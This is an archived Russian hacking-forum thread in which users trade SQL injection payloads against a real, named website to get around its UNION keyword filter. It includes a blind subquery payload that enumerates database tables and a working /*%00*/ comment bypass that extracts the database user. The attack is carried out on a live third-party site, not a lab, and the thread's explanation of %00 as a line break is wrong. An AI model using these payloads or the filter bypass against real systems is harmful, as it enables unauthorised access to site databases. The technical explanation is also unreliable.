Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Фильтрация UNION на крупном сайте

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Фильтрация UNION на крупном сайте
Имя
Сообщение << Старые топики   Новые топики >>
Фильтрация UNION на крупном сайте - 2011-12-07 16:19:03.210000   
GaMeSTeR_04reg

Сообщений: 69
Оценки: 0
Присоединился: 2010-11-27 18:15:55.573333
 Вообщем не удалось обойти фильтрацию UNION по этому вот ссылка на растерзание:
http://www.tit.by/stat.php?id=18101+aNd+1=0+UN%00ION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+ У кого получиться просьба кинуть хотябы в личку.
Post #: 1
RE: Фильтрация UNION на крупном сайте - 2011-12-07 21:58:00.416666   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
 Подзапросами не судьба?
Post #: 2
RE: Фильтрация UNION на крупном сайте - 2011-12-08 09:44:00.493333   
GaMeSTeR_04reg

Сообщений: 69
Оценки: 0
Присоединился: 2010-11-27 18:15:55.573333
quote:

ORIGINAL: r1dex

Подзапросами не судьба?


Продемонстрируй
Post #: 3
RE: Фильтрация UNION на крупном сайте - 2011-12-08 20:24:51.343333   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
 http://www.tit.by/stat.php?id=18102+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+28,1),1,1)))>1–+
Post #: 4
RE: Фильтрация UNION на крупном сайте - 2012-02-03 08:00:52.223333   
Сaptain T0ma5o

Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
 Сто лет уже не флудил на форуме) Кину свои пять копеек… фильтрация обходится не так, вот валидный пример
http://www.tit.by/stat.php?id=18101+/*%00*/+aNd+1=0+UNION+SELECT+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+–+
Post #: 5
RE: Фильтрация UNION на крупном сайте - 2012-02-06 17:40:48.476666   
Tomagawk

Сообщений: 3
Оценки: 0
Присоединился: 2010-11-16 14:17:34.633333
 Captain TOma50, /*%00*/ - это что за конструкция такая? И как она работает?
Post #: 6
RE: Фильтрация UNION на крупном сайте - 2012-02-07 00:02:35.566666   
Сaptain T0ma5o

Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
 Готовый запрос тебе дали, валидный, можно погуглить и разобраться как это работает. Можно и просто логически подумать, %00 символ переноса строки, функция которая осуществляет фильтрацию его не переваривает и не добирается до иньекта, запрос попадает в БД, чтобы запрос не развалился %00 запиливаем как комментарий - /*%00*/, то есть sql его просто игнорирует.
Post #: 7
Страниц:  [1]
Все форумы >> [Уязвимости] >> Фильтрация UNION на крупном сайте







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.